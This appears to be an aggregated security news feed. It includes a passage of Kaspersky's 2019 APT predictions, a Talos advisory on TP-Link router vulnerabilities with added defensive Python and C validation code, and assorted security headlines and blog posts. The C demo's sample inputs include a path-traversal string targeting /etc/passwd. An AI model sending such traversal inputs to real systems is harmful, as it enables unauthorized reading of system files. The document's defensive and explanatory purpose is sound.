Instead of creating more sophisticated campaigns, in some cases it appears to be more efficient for some very specific actors who have the capability to do so, to directly target infrastructure and companies where victims can be found, such as ISPs. Sometimes this can be accomplished through regulation, without the need for malware.

Some operations are simply outsourced to different groups and companies that use different tools and techniques, making attribution extremely difficult. It’s worth keeping in mind that in the case of government-sponsored operations this ‘centrifugation’ of resources and talent might affect the future of such campaigns. In this scenario the technical capabilities and tools are owned by private industry, and they are for sale to any customer that, in many cases, doesn’t fully understand the technical details and consequences behind them.

All this suggests that we’re unlikely to discover new highly sophisticated operations – well-resourced attackers are more likely to simply shift to new paradigms.

Networking hardware and IoT

It just seemed logical that at some point every actor would deploy capabilities and tools designed to target networking hardware. Campaigns like VPNFilter were a perfect example of how attackers have already started deploying their malware to create a multipurpose ‘botnet’. In this particular case, even though the malware was extremely widespread, it took some time to detect the attack, which is worrisome considering what might happen in more targeted operations.

Actually, this idea can go even further for well-resourced actors: why not directly target even more elemental infrastructure instead of just focusing on a target organization? We haven’t reached that level of compromise (to our knowledge), but it was clear from past examples (like Regin) how tempting that level of control is for any attacker.

Vulnerabilities in networking hardware allow attackers to follow different directions. They might go for a massive botnet-style compromise and use that network in the future for different goals, or they might approach selected targets for more clandestine attacks. In this second group we might consider ‘malware-less’ attacks, where opening a VPN tunnel to mirror or redirect traffic might provide all the necessary information to an attacker.

All these networking elements might also be part of the mighty IoT, where botnets keep growing at an apparently unstoppable pace. These botnets could be incredibly powerful in the wrong hands when it comes to disrupting critical infrastructure, for instance. This can be abused by well-resourced actors, possibly using a cover group, or in some kind of terror attack.

One example of how these versatile botnets can be used, other than for disruptive attacks, is in short-range frequency hopping for malicious communications, avoiding monitoring tools by bypassing conventional exfiltration channels.

Even though this seems to be a recurrent warning year after year, we should never underestimate IoT botnets – they keep growing stronger.

Public retaliation

One of the biggest questions in terms of diplomacy and geopolitics was how to deal with an active cyberattack. The answer is not simple and depends heavily on how bad and blatant the attack was, among many other considerations. However, it seems that after hacks like that on the Democratic National Committee, things became more serious.

Investigations into recent high-profile attacks, such as the Sony Pictures Entertainment hack or the attack on the DNC, culminated in named suspects being indicted. That results not only in individuals facing charges but also in a public statement of who was behind the attack. This can be used to create a wave of opinion that might be part of an argument for more serious diplomatic consequences.

Actually we have seen Russia suffering such consequences as a result of their alleged interference in democratic processes. This might make others rethink future operations of this kind.

However, the fear of something like that happening, or the thought that it might already have happened, was the attackers’ biggest achievement. They can now exploit such fear, uncertainty and doubt in different, more subtle ways – something we saw in notable operations, including that of the Shadow Brokers. We expect more to come.

What will we see in the future? The propaganda waters were probably just being tested by past operations. We believe this has just started and it will be abused in a variety of ways, for instance, in false flag incidents like we saw with Olympic Destroyer, where it’s still not clear what the final objective was and how it might have played out.

Emergence of newcomers

Simplifying somewhat, the APT world seems to be breaking into two groups: the traditional well-resourced most advanced actors (that we predict will vanish) and a group of energetic newcomers who want to get in on the game.

The thing is that the entry barrier has never been so low, with hundreds of very effective tools, re-engineered leaked exploits and frameworks of all kinds publicly available for anyone to use. As an additional advantage, such tools make attribution nearly impossible and can be easily customized if necessary.

There are two regions in the world where such groups are becoming more prevalent: South East Asia and the Middle East. We have observed the rapid progression of groups suspected of being based in these regions, traditionally abusing social engineering for local targets, taking advantage of poorly protected victims and the lack of a security culture. However, as targets increase their defenses, attackers do the same with their offensive capabilities, allowing them to extend their operations to other regions as they improve the technical level of their tools. In this scenario of scripting-based tools we can also find emerging companies providing regional services who, despite OPSEC failures, keep improving their operations.

One interesting aspect worth considering from a more technical angle is how JavaScript post-exploitation tools might find a new lease of life in the short term. Compared with PowerShell, script-host JavaScript is harder for an administrator to restrict, leaves far fewer system logs and runs on older operating systems. The caveat is that the gap is narrower than it looks: Windows Script Host can be disabled outright through its ‘Enabled’ registry setting, and on Windows 10 its JScript and VBScript engines are instrumented by AMSI, so the advantage is greatest on legacy hosts.

The negative rings

The year of Meltdown/Spectre/AMDFlaws and all the associated vulnerabilities (and those to come) made us rethink where the most dangerous malware actually lives. And even though we have seen almost nothing in the wild abusing vulnerabilities below Ring 0, the mere possibility is truly scary, as such malware would be invisible to almost all the security mechanisms we have.

For instance, in the case of SMM there has been at least one publicly available PoC since 2015. SMM (System Management Mode) is an x86 operating mode whose memory (SMRAM) is locked away even from Ring 0, so code running there has full control of the machine while remaining invisible to the operating system and to any security software it runs. That makes us wonder whether the fact that we haven’t found any malware abusing it so far is simply because it is so difficult to detect. Abusing this mode seems to be too good an opportunity to ignore, so we are sure that several groups have been trying to exploit such mechanisms for years, maybe successfully.

We see a similar situation with virtualization/hypervisor malware, or with UEFI malware. We have seen PoCs for both, and the 2015 Hacking Team leak even contained a UEFI persistence module that had existed since at least 2014, but again there are almost no real ITW examples as yet; ESET’s September 2018 LoJax report, describing a UEFI rootkit deployed by Sednit, is the notable exception.

Will we ever find these kinds of unicorns? Or haven’t they been exploited yet? The latter possibility seems unlikely.

Your favorite infection vector

In probably the least surprising prediction of this article we would like to say a few words about spear phishing. We believe that the most successful infection vector ever will become even more important in the near future. The key to its success remains its ability to spark the curiosity of the victim, and recent massive leaks of data from various social media platforms might help attackers improve this approach.

Data obtained from attacks on social media giants such as Facebook and Instagram, as well as LinkedIn and Twitter, is now available on the market for anyone to buy. In some cases, it is still unclear what kind of data was targeted by the attackers, but it might include private messages or even credentials. This is a treasure trove for social engineers, and could result in, for instance, an attacker using the stolen credentials of a close contact of yours to share something on social media that you already discussed privately, dramatically improving the chances of a successful attack.

This can be combined with traditional scouting techniques where attackers double-check the target to make sure the victim is the right one, minimizing the distribution of malware and its detection. In terms of attachments, it is fairly standard to make sure there is human interaction before firing off any malicious activity, thus avoiding automatic detection systems.

Indeed, there are several initiatives using machine learning to improve phishing’s effectiveness. It’s still unknown what the results would be in a real-life scenario, but what seems clear is that the combination of all these factors will keep spear phishing as a very effective infection vector, especially via social media in the months to come.

Destructive destroyer

Olympic Destroyer was one of the most famous cases of potentially destructive malware during the past year, but many attackers are incorporating such capabilities in their campaigns on a regular basis. Destructive attacks have several advantages for attackers, especially in terms of creating a diversion and cleaning up any logs or evidence after the attack, or simply as a nasty surprise for the victim.

Some of these destructive attacks have geostrategic objectives related to ongoing conflicts as we have seen in Ukraine, or with political interests like the attacks that affected several oil companies in Saudi Arabia. In some other cases they might be the result of hacktivism, or activity by a proxy group that’s used by a more powerful entity that prefers to stay in the shadows.

Anyway, the key to all these attacks is that they are ‘too good’ not to use. In terms of retaliation, for instance, governments might use them as a response ranging somewhere between a diplomatic answer and an act of war, and indeed some governments are experimenting with them. Most of these attacks are planned in advance, which involves an initial stage of reconnaissance and intrusion. We don’t know how many potential victims are already in this situation where everything is ready, just waiting for the trigger to be pulled, or what else the attackers have in their arsenal waiting for the order to attack.

ICS environments and critical infrastructure are especially vulnerable to such attacks, and even though industry and governments have put a lot of effort in over the last few years to improve the situation, things are far from ideal. That’s why we believe that even though such attacks will never be widespread, in the next year we expect to see some occurring, especially in retaliation to political decisions.

Advanced supply chain

This is one of the most worrisome vectors of attack, which has been successfully exploited over the last two years, and it has made everyone think about how many providers they have and how secure they are. Well, there is no easy answer to this kind of attack.

Even though this is a fantastic vector for targeting a whole industry (similar to watering hole attacks) or even a whole country (as seen with NotPetya), it’s not that good when it comes to more targeted attacks as the risk of detection is higher. We have also seen more indiscriminate attempts like injecting malicious code in public repositories for common libraries. The latter technique might be useful in very carefully timed attacks when these libraries are used in a very particular project, with the subsequent removal of the malicious code from the repository.
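As an added example (not code from the report), here is the kind of hash-pinning check that catches the ‘inject, build, revert’ window described above: the hashes of a vendored library are recorded at review time and every later build is compared against them, so a copy pulled while the malicious commit was live is flagged even after upstream has been cleaned up. The directory layout, the library and the ‘injected’ line are constructed for the demonstration.

```python
"""Hash-pinned verification of vendored dependencies (added example)."""
import hashlib
import tempfile
from pathlib import Path
from typing import Dict, List, Tuple


def sha256_file(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(65536), b""):
            h.update(chunk)
    return h.hexdigest()


def build_lock(vendor_dir: Path) -> Dict[str, str]:
    """Snapshot: relative path -> sha256 for every file under vendor_dir."""
    return {
        p.relative_to(vendor_dir).as_posix(): sha256_file(p)
        for p in sorted(vendor_dir.rglob("*"))
        if p.is_file()
    }


def verify(vendor_dir: Path, lock: Dict[str, str]) -> Dict[str, List[str]]:
    """Compare the tree with the lock; anything not matching should fail the build."""
    current = build_lock(vendor_dir)
    return {
        "modified": sorted(k for k in lock if k in current and current[k] != lock[k]),
        "missing": sorted(k for k in lock if k not in current),
        "unexpected": sorted(k for k in current if k not in lock),
    }


def passed(report: Dict[str, List[str]]) -> bool:
    return not any(report.values())


CLEAN = "def helper(x):\n    return x * 2\n"
# Constructed stand-in for an injected change; the string is only written to a file, never executed.
TAMPERED = "import os  # injected: attacker code would go here\n" + CLEAN


def demo() -> Tuple[Dict[str, List[str]], Dict[str, List[str]]]:
    """Scenario: the library is backdoored upstream for a short window, then reverted.

    Returns the verification reports for a build during the window and one after it.
    """
    with tempfile.TemporaryDirectory() as tmp:
        vendor = Path(tmp) / "vendor"
        lib = vendor / "somelib" / "__init__.py"
        lib.parent.mkdir(parents=True)
        lib.write_text(CLEAN)
        lock = build_lock(vendor)      # captured at review time, committed with the project

        lib.write_text(TAMPERED)       # what a build pulls while the bad commit is live
        during = verify(vendor, lock)

        lib.write_text(CLEAN)          # upstream quietly reverts the commit
        after = verify(vendor, lock)
    return during, after


if __name__ == "__main__":
    during, after = demo()
    print("during window:", "ok" if passed(during) else "FAIL", during["modified"])
    print("after revert: ", "ok" if passed(after) else "FAIL", after["modified"])
```

pip’s hash-checking mode (`pip install --require-hashes -r requirements.txt`) and lockfiles with integrity fields in other ecosystems apply the same idea to downloaded artifacts. The point that matters is when the reference hash is captured: it has to come from a reviewed copy, not from whatever the build happened to download, or the tampered copy simply becomes the baseline.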

Now, can this kind of attack be used in a more targeted way? It appears to be difficult in the case of software because it will leave traces everywhere and the malware is likely to be distributed to several customers. It is more realistic in cases when the provider works exclusively for a specific customer.

What about hardware implants? Are they a real possibility? There has been some recent controversy about that. Even though we saw from Snowden’s leaks how hardware can be manipulated on its way to the customer, this does not appear to be something that most actors can do other than the very powerful ones. And even they will be limited by several factors.

However, in cases where the buyer of a particular order is known, it might be more feasible for an actor to try and manipulate hardware at its origin rather than on its way to the customer.

It’s difficult to imagine how all the technical controls in an industrial assembly line could be circumvented and how such manipulation could be carried out. We don’t want to discard this possibility, but it would probably entail the collaboration of the manufacturer.

All in all, supply chain attacks are an effective infection vector that we will continue to see. In terms of hardware implants we believe it is extremely unlikely to happen and, if it does, we will probably never know.

And mobile

This is in every year’s predictions. Nothing groundbreaking is expected, but it’s always interesting to think about the two speeds for this slow wave of infections. It goes without saying that all actors have mobile components in their campaigns; it makes no sense only going for PCs. The reality is that we can find many examples of artifacts for Android, but also a few improvements in terms of attacking iOS.

Even though a successful iPhone infection requires chaining several 0-days, it’s always worth remembering that incredibly well-resourced actors can pay for such technology and use it in critical attacks. Some private companies claim they can access any iPhone that they physically possess. Other less affluent groups can find some creative ways to circumvent security on such devices, for instance by running rogue MDM servers and using social engineering to get targets to enrol their devices, which gives the attackers the ability to install malicious applications.

It will be interesting to see if the boot code for iOS leaked at the beginning of the year will provide any advantage to the attackers, or if they’ll find new ways of exploiting it.

In any case, we don’t expect any big outbreak when it comes to mobile targeted malware, but we expect to see continuous activity by advanced attackers aimed at finding ways to access their targets’ devices.

The other things

What might attackers be thinking about in more futuristic terms? One of the ideas, especially in the military field, might be to stop using weak, error-prone humans and replace them with something more mechanical. With that in mind, and also thinking of the alleged GRU agents expelled from the Netherlands last April after trying to hack into the OPCW’s Wi-Fi network as an example, what about using drones instead of human agents for short-range hacking?

Or what about backdooring some of the hundreds of cryptocurrency projects for data gathering, or even financial gain?

Use of any digital good for money laundering? What about using in-game purchases and then selling such accounts later in the marketplace?

There are so many possibilities that predictions always fall short of reality. The complexity of the environment cannot be fully understood anymore, raising possibilities for specialist attacks in different areas. How can a stock exchange’s internal inter-banking system be abused for fraud? I have no idea; I don’t even know if such a system exists. This is just one example of how open to the imagination the attackers behind these campaigns are.

We are here to try and anticipate, to understand the attacks we don’t yet understand, and to prevent them from occurring in the future.

Full report “Kaspersky Security Bulletin: Threat Predictions for 2019” (English, PDF)

Instagram Patched A Data Download Tool Bug That Exposed Users Passwords

Instagram seems to have followed its parent company as it endured another major problem affecting user accounts. Reportedly, Instagram has

Instagram Patched A Data Download Tool Bug That Exposed Users Passwords on Latest Hacking News.

Vulnerability Spotlight: Multiple remote vulnerabilities in TP-Link TL-R600VPN

Vulnerabilities discovered by Jared Rittle of Cisco Talos.

Cisco Talos is disclosing multiple vulnerabilities in the TP-Link TL-R600VPN router. TP-Link produces a number of different types of small and home office (SOHO) routers. Talos discovered several bugs in this particular router model that could lead to remote code execution.

Overview

There are two root causes of the vulnerabilities: a lack of input sanitisation and parsing errors. The lack of proper input sanitisation leads to the vulnerabilities TALOS-2018-0617/18, which can be exploited without authentication. Parsing errors are responsible for the vulnerabilities TALOS-2018-0619/20; however, these can only be exploited within an authenticated session. The remote code execution takes place in the context of HTTPD. However, since the HTTPD process runs as root, an attacker can run code with elevated privileges.

All vulnerabilities were found on HWv3 FRNv1.3.0 and HWv2 FRNv1.2.3, except for TALOS-2018-0620, which was found only on HWv3 FRNv1.3.0.

TALOS-2018-0617 — TP-Link TL-R600VPN HTTP denial of service

An exploitable denial-of-service vulnerability exists in the URI-parsing function of the TP-Link TL-R600VPN HTTP server. If a directory traversal is attempted on any of the vulnerable pages (help, images, frames, dynaform, localization) and the requested page is a directory instead of a file, the web server will enter an infinite loop, making the management portal unavailable. This request doesn't need to be authenticated.

CVE: CVE-2018-3948

A full technical advisory is available here.

TALOS-2018-0618 — TP-Link TL-R600VPN HTTP server information disclosure

An exploitable information disclosure vulnerability exists in the HTTP server functionality of the TP-Link TL-R600VPN. A directory traversal vulnerability exists in the TP-Link TL-R600VPN in both authenticated and unauthenticated forms. If a standard directory traversal is used with a base page of 'help,' the traversal does not require authentication and can read any file on the system.

CVE: CVE-2018-3949

A full technical advisory is available here.

TALOS-2018-0619 — TP-Link TL-R600VPN HTTP server ping address remote code execution

An exploitable remote code execution vulnerability exists in the ping and traceroute functions of the TP-Link TL-R600VPN HTTP server. The router does not check the size of the data passed to its 'ping_addr' field when performing a ping operation. By sending a large amount of data to this field, an attacker could cause a stack-based buffer overflow, leading to remote code execution or a simple crash of the device's HTTP server. An attacker would need to be in an authenticated session to trigger this vulnerability.

CVE: CVE-2018-3950

A full technical advisory is available here.

TALOS-2018-0620 — TP-Link TL-R600VPN HTTP server fs directory remote code execution

An exploitable remote code execution vulnerability exists in the HTTP header-parsing function of the TP-Link TL-R600VPN HTTP server. A specially crafted HTTP request can cause a buffer overflow, resulting in remote code execution on the device. During this process, the server calculates the length of the user-controlled HTTP header buffer and adds the value to the input buffer offset. This creates an overflow condition when the router processes a longer-than-expected GET request. An attacker needs to be authenticated to be able to trigger this vulnerability.

CVE: CVE-2018-3951

A full technical advisory is available here.

Discussion

Over the past year, Talos has disclosed various vulnerabilities in internet-of-things (IoT) devices and SOHO routers. These are just the latest example that these pieces of equipment are not only vulnerable, but also lack the generic operating-system protections that mitigate vulnerabilities such as buffer overflows. Fortunately, in the case of TL-R600VPN routers, the critical vulnerabilities that lead to remote code execution require authentication. However, the resulting code would execute with root privileges.
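As an added illustration (not code from Talos, TP-Link or the router's firmware), the following C shows the three checks whose absence the advisory describes: a bounded, character-restricted validation of the ping target before it is copied into a fixed buffer (the 'ping_addr' overflow), a path-confinement check for the page-serving routes (the 'help' traversal), and a regular-file test so that a directory is never handed to the file reader (the infinite-loop denial of service). The limit PING_ADDR_MAX, the function names and all sample inputs are constructed for this example; the real firmware's buffer sizes are not stated in the advisory.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <string.h>
#include <ctype.h>
#include <sys/stat.h>

/* Upper bound for the ping/traceroute target field. This limit is an
   assumption for the example; the advisory does not give the real size. */
#define PING_ADDR_MAX 255

/* Return 1 if addr is a plausible IPv4 literal or hostname for a ping
   target (letters, digits, '.', '-', ':') and is short enough to fit a
   PING_ADDR_MAX + 1 byte buffer; otherwise 0. The length is bounded by
   the caller's buffer, never by the length of the incoming data. */
int validate_ping_addr(const char *addr)
{
    if (addr == NULL) return 0;
    size_t n = 0;
    while (n <= PING_ADDR_MAX && addr[n] != '\0') n++;   /* bounded scan */
    if (n == 0 || n > PING_ADDR_MAX) return 0;
    for (size_t i = 0; i < n; i++) {
        unsigned char c = (unsigned char)addr[i];
        if (!(isalnum(c) || c == '.' || c == '-' || c == ':')) return 0;
    }
    return 1;
}

/* Copy a ping target into a fixed-size buffer only after validation.
   Returns 1 on success, 0 if the input was rejected or would not fit. */
int copy_ping_addr(char *dst, size_t dstlen, const char *src)
{
    if (!validate_ping_addr(src)) return 0;
    size_t n = strlen(src);
    if (n + 1 > dstlen) return 0;          /* room for the terminating NUL */
    memcpy(dst, src, n + 1);
    return 1;
}

/* Self-check helper: a constructed 300-byte string of 'A' (well past
   PING_ADDR_MAX) must be rejected rather than copied onto the stack. */
int oversized_ping_addr_is_rejected(void)
{
    char big[301];
    memset(big, 'A', 300);
    big[300] = '\0';
    char dst[PING_ADDR_MAX + 1];
    return copy_ping_addr(dst, sizeof dst, big) == 0;
}

/* Return 1 if an already percent-decoded URI path stays inside the web
   root: it must be absolute and contain no ".." segment and no backslash. */
int path_is_confined(const char *path)
{
    if (path == NULL || path[0] != '/') return 0;
    const char *p = path;
    while (*p) {
        const char *seg = p;
        while (*p && *p != '/') p++;
        size_t len = (size_t)(p - seg);
        if (len == 2 && seg[0] == '.' && seg[1] == '.') return 0;
        if (memchr(seg, '\\', len) != NULL) return 0;
        if (*p == '/') p++;
    }
    return 1;
}

/* Return 1 only if fs_path names an existing regular file. The advisory's
   infinite loop is triggered when the requested page is a directory, so
   this test belongs before the file is ever opened. */
int is_regular_file(const char *fs_path)
{
    struct stat st;
    if (stat(fs_path, &st) != 0) return 0;
    return S_ISREG(st.st_mode) ? 1 : 0;
}

int main(void)
{
    /* Constructed sample inputs for demonstration. */
    const char *targets[] = { "192.168.0.1", "router.example", "", "host name" };
    for (size_t i = 0; i < sizeof targets / sizeof targets[0]; i++)
        printf("ping_addr %-16s -> %s\n", targets[i],
               validate_ping_addr(targets[i]) ? "accepted" : "rejected");
    printf("oversized input rejected: %d\n", oversized_ping_addr_is_rejected());

    const char *paths[] = { "/help/index.htm", "/help/../../etc/passwd", "/images/", "help" };
    for (size_t i = 0; i < sizeof paths / sizeof paths[0]; i++)
        printf("path %-24s -> %s\n", paths[i],
               path_is_confined(paths[i]) ? "confined" : "rejected");
    printf("\"/\" is a regular file: %d\n", is_regular_file("/"));
    return 0;
}
```

Note that "/images/" passes the confinement check but fails the regular-file check: the two tests answer different questions, and the advisory's denial of service sits exactly in the gap between them.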


Coverage

The following Snort IDs have been released to detect these vulnerabilities:

Vovox Data Exposure: 26 Million SMS Texts; Two Factor Codes, Phone Numbers And More

Vovox has reportedly exposed over 26 million texts belonging to its customers which include Microsoft, Amazon, and Google. The Big

Vovox Data Exposure: 26 Million SMS Texts; Two Factor Codes, Phone Numbers And More on Latest Hacking News.

Hackers May Exploit Microsoft PowerPoint For Malware Attacks

Microsoft Office tools, particularly Word, Excel, and PowerPoint, have always enticed criminal hackers due to their popularity among the

Hackers May Exploit Microsoft PowerPoint For Malware Attacks on Latest Hacking News.

An iPhone X Vulnerability Allows Hackers To Access Deleted Pictures

Recently, two researchers have demonstrated an iPhone X vulnerability that could allow an attacker to access deleted pictures. iPhone

An iPhone X Vulnerability Allows Hackers To Access Deleted Pictures on Latest Hacking News.

Children’s Smartwatch Vulnerability Allows Hackers To Stalk and Talk To Your Kids

Child-tracking smartwatches provide a convenient means of monitoring a child’s safety for parents. However, if the devices have security flaws,

Children’s Smartwatch Vulnerability Allows Hackers To Stalk and Talk To Your Kids on Latest Hacking News.

Windows 10 October Update Brings Back Old Mapped Drives Bug

After a lot of chaos and problems, Microsoft has resumed the Windows 10 1809 rollout. While the recent October update

Windows 10 October Update Brings Back Old Mapped Drives Bug on Latest Hacking News.

Adobe Patch Tuesday November Fixed Multiple Information Disclosure Vulnerabilities

This week, Adobe released its monthly scheduled update bundle addressing vulnerabilities within its different products. The Adobe patch Tuesday November

Adobe Patch Tuesday November Fixed Multiple Information Disclosure Vulnerabilities on Latest Hacking News.

CVSS Scores Often Misleading for ICS Vulnerabilities: Experts

While the Common Vulnerability Scoring System (CVSS) can be useful for rating vulnerabilities, the scores assigned to flaws affecting industrial control systems (ICS) may be misleading, which can have negative consequences for organizations, particularly if they rely solely on CVSS for prioritizing patches.

The Art and Science of Secure Coding: Key Practices that Stand Out

Flaws in code lines, file system and data input methods make up the core security vulnerability of any application. This is what we address through secure coding practices. Secure coding guidelines stand out as the last battling army before the enemy line of security risks and threats. Basically, secure coding practices will make developers more […]

The post The Art and Science of Secure Coding: Key Practices that Stand Out appeared first on The State of Security.

Report: Small, Stealthy Groups Behind Worst Cybercrimes

A small group of cybercriminals is responsible for the most damaging cyberattacks, often with the help of state sponsorship. Even so, low-level criminal activity on the dark web still poses the most widespread and immediate security threat, with cryptocurrency mining, ransomware and malware all on the rise, a recent report has found.

Google Went Down After Facing BGP Mishap

On Monday, numerous Internet users in the USA faced trouble after Google went down for over an hour. Upon scratching

Google Went Down After Facing BGP Mishap on Latest Hacking News.

OPM Security Improves, But Many Issues Still Unresolved: GAO

The U.S. Office of Personnel Management (OPM) has improved its security posture since the data breaches disclosed in 2015, but many issues are still unresolved, according to a report published this week by the Government Accountability Office (GAO).

Unpatched Microsoft Word Video Feature Vulnerability is Being Exploited In The Wild

Last month, researchers from a cybersecurity firm shared their findings on a bug in Microsoft Word online’s video feature that

Unpatched Microsoft Word Video Feature Vulnerability is Being Exploited In The Wild on Latest Hacking News.

The value in vulnerability assessments: closing gaps to improve security

Vulnerability assessments usually involve using automated tools such as Nessus or Qualys to carry out a passive scan of an organisation’s systems. The process produces a list of security gaps and ranks them in order of risk. It gives an organisation clear data to guide the process of deciding which issues to prioritise first based on budget, available resources, or likelihood of the threat.

If forewarned is forearmed, then the value of a vulnerability assessment is that it identifies weaknesses in your systems proactively. It’s different from a penetration test, which not only finds security gaps but actively exploits them to replicate the damage a malicious attacker could do, without the repercussions.

Why check for vulnerabilities?

Lately, we’re seeing organisations carry out vulnerability assessments, or get an independent provider to do it for them, much more frequently. I think there are two reasons for this. One is the increasing adoption of the ISO 27001 information security standard. We advise organisations that want to get certified or stay compliant to check for vulnerabilities at least twice a year and perform a penetration test at least once a year.

The second driver is – surprise, surprise – GDPR. Growing numbers of businesses and public sector agencies are now aware that they need to protect data. Checking for weak points can help them put safeguards in place to avoid breaches. In the event of a breach, an organisation may avoid heavier penalties if it can prove to the regulator that it has been carrying out vulnerability assessments and doing its due diligence. On the other hand, the authorities won’t look too kindly on breach victims that were running old operating systems with no security controls or patching mechanisms in place.

What to fix

I carry out vulnerability assessments every week, and many of the risks I find are very common. Many of them fall into the categories of medium or high risk. For example, many websites still use old versions of SSL or TLS for encrypting data transfers. Some people might assume that a brochure website doesn’t need this level of protection, but I think that’s a mistake. Even a static page may have a function that calls another function that talks to the database or another application. This is a relatively easy issue to fix, and it addresses a potentially large security hole.

Even for a brochure website, it’s worth doing this upgrade since it’s a big gain for relatively little effort. Implementing TLS carries little cost and eliminates a lot of potential weaknesses. Since SSL was deprecated, it’s a matter of changing to TLS 1.1 or 1.2 which in some cases is as simple as checking a box.

To upgrade or not to upgrade

Another common issue that vulnerability assessments will uncover is out of date software like Apache or OpenSSH. (I recently found one site using a five-year-old version of OpenSSH!) As with the risks I referred to above, fixing them is often a matter of clicking the ‘update’ button in the application.

Whether an organisation updates or not will depend on its attitude to risk. Some choose not to do so because they are concerned about affecting their production environment. Or, they might not have time and resources to test the stability of an application on the new version. I would always argue in favour of acting, but at the very least, a vulnerability assessment will highlight areas that you can rank in order of priority.

The length of time it takes to conduct the assessment will vary. It’s not necessarily as simple a calculation as adding up the number of IP addresses to check. I’ve seen three IP addresses take four hours to scan. It also depends on what software the organisation uses, and whether it’s patched or unpatched.

Taking action afterwards

Let’s say the testing lasts a day. Writing the report then involves taking the findings from the automated scanning tool and translating that into language that will allow a client to weigh up its business risk. Some companies take the report and fix the issues that it covers. Some use it as a talking point with their software development teams, to make them aware of certain vulnerabilities. Best practice advises that those organisations run an assessment a few months later to check that any fixes they implemented were successful.

However, I’ve also seen the opposite, where I have carried out monthly vulnerability checks and the client chooses not to fix the issues that the report raises. That goes to the heart of security: making decisions based on the level of risk you’re prepared to bear. Good security practice suggests looking for weak points in your security before someone with malicious intentions does it for you.

The post The value in vulnerability assessments: closing gaps to improve security appeared first on BH Consulting.

More Spectre/Meltdown-Like Attacks

Back in January, we learned about a class of vulnerabilities against microprocessors that leverages various performance and efficiency shortcuts for attack. I wrote that the first two attacks would be just the start:

It shouldn't be surprising that microprocessor designers have been building insecure hardware for 20 years. What's surprising is that it took 20 years to discover it. In their rush to make computers faster, they weren't thinking about security. They didn't have the expertise to find these vulnerabilities. And those who did were too busy finding normal software vulnerabilities to examine microprocessors. Security researchers are starting to look more closely at these systems, so expect to hear about more vulnerabilities along these lines.

Spectre and Meltdown are pretty catastrophic vulnerabilities, but they only affect the confidentiality of data. Now that they -- and the research into the Intel ME vulnerability -- have shown researchers where to look, more is coming -- and what they'll find will be worse than either Spectre or Meltdown. There will be vulnerabilities that will allow attackers to manipulate or delete data across processes, potentially fatal in the computers controlling our cars or implanted medical devices. These will be similarly impossible to fix, and the only strategy will be to throw our devices away and buy new ones.

We saw several variants over the year. And now researchers have discovered seven more.

Researchers say they've discovered the seven new CPU attacks while performing "a sound and extensible systematization of transient execution attacks" -- a catch-all term the research team used to describe attacks on the various internal mechanisms that a CPU uses to process data, such as the speculative execution process, the CPU's internal caches, and other internal execution stages.

The research team says they've successfully demonstrated all seven attacks with proof-of-concept code. Experiments to confirm six other Meltdown-attacks did not succeed, according to a graph published by researchers.

Microprocessor designers have spent the year rethinking the security of their architectures. My guess is that they have a lot more rethinking to do.

Chinese APT Group Exploit Fixed Critical Adobe ColdFusion Vulnerability On Unpatched Servers

In September, Adobe patched numerous critical vulnerabilities in ColdFusion. However, a couple of weeks after Adobe released the patches, researchers

Chinese APT Group Exploit Fixed Critical Adobe ColdFusion Vulnerability On Unpatched Servers on Latest Hacking News.

Canadian University Shuts Down Network in Response to Cryptocurrency Mining Attack

St. Francis Xavier University had to take its critical IT systems offline after it discovered a scheme to mine cryptocurrency using its network resources.

On Nov. 9, the school’s IT team identified an automated attack launched by unknown threat actors in an effort to steal computing power to mine cryptocurrency, otherwise known as cryptojacking.

After consulting with security specialists, the university, which is based in Nova Scotia, made the decision to disable all network systems. Representatives of the school announced plans to reinstate the offline servers across its network in stages to reduce potential security risks.

Why Did the University Shut Down Its Network?

So far, the university has reported no evidence that the personal information of students, faculty or other parties has been leaked or stolen as part of the attack. To be safe, however, administrators reset the passwords for all university accounts across campus. The IT team said it would continue to look for anomalous behavior over the next month.

The university’s swift response affected basic access to network resources such as Wi-Fi and educational software application Moodle. Meanwhile, student payment cards and debit transactions were temporarily inoperable. The school said it plans to publish a list of which services have been restored and which are still in the queue, such as its MesAmis reporting system and Banner database. The researchers did not explain exactly how the malware was installed on the system.

How to Keep Cryptocurrency Mining Threats at Bay

The St. Francis Xavier University incident is an increasingly rare example of cryptojackers focusing on bitcoin. According to security experts, general-purpose computers are not ideal for bitcoin given the sophisticated nature of its algorithm. Instead, attacks more often exploit IT resources to mine for newer cryptocurrencies such as Monero and Ethereum.

Regardless of what’s being mined, organizations that invest in security information and event management (SIEM) are better positioned to identify cryptojacking before it’s too late to remediate the threat without halting the entire network.

Sources: St. Francis Xavier, ZDNet

The post Canadian University Shuts Down Network in Response to Cryptocurrency Mining Attack appeared first on Security Intelligence.

Red Dead Redemption 2 Glitch Lets You Get Any Horse Randomly

In a game set up in the Westernized era of the late 19th century, the main charm for the players

Red Dead Redemption 2 Glitch Lets You Get Any Horse Randomly on Latest Hacking News.

Oracle and "Responsible Disclosure"

I've been writing about "responsible disclosure" for over a decade; here's an essay from 2007. Basically, it's a tacit agreement between researchers and software vendors. Researchers agree to withhold their work until software companies fix the vulnerabilities, and software vendors agree not to harass researchers and fix the vulnerabilities quickly.

When that agreement breaks down, things go bad quickly. This story is about a researcher who published an Oracle zero-day because Oracle has a history of harassing researchers and ignoring vulnerabilities.

Software vendors might not like responsible disclosure, but it's the best solution we have. Making it illegal to publish vulnerabilities without the vendor's consent means that they won't get fixed quickly -- and everyone will be less secure. It also means less security research.

This will become even more critical with software that affects the world in a direct physical manner, like cars and airplanes. Responsible disclosure makes us safer, but it only works if software vendors take the vulnerabilities seriously and fix them quickly. Without any regulations that enforce that, the threat of disclosure is the only incentive we can impose on software vendors.

Nigerian ISP Hijacks Google Traffic, Sends It Through Russia and China

A small Nigerian Internet service provider (ISP) hijacked traffic meant for Google data centers on Monday, re-routing local traffic through China and Russia and making some hosted services temporarily unavailable for users.

The post Nigerian ISP Hijacks Google Traffic, Sends It Through Russia and China appeared first on The Security Ledger.

Related Stories

Microsoft Patch Tuesday — November 2018: Vulnerability disclosures and Snort coverage

Microsoft released its monthly security update today, disclosing a variety of vulnerabilities in several of its products. The latest Patch Tuesday covers 53 vulnerabilities: 11 rated "critical," 40 rated "important," and one each rated "moderate" and "low."

The advisories cover bugs in the Chakra scripting engine, Microsoft Outlook and DirectX.

This update also includes three advisories. One covers vulnerabilities in Adobe Flash Player, and another covers important bugs in the Microsoft Surface tablet. Additionally, there is guidance for how users should configure BitLocker in order to properly enforce software encryption.

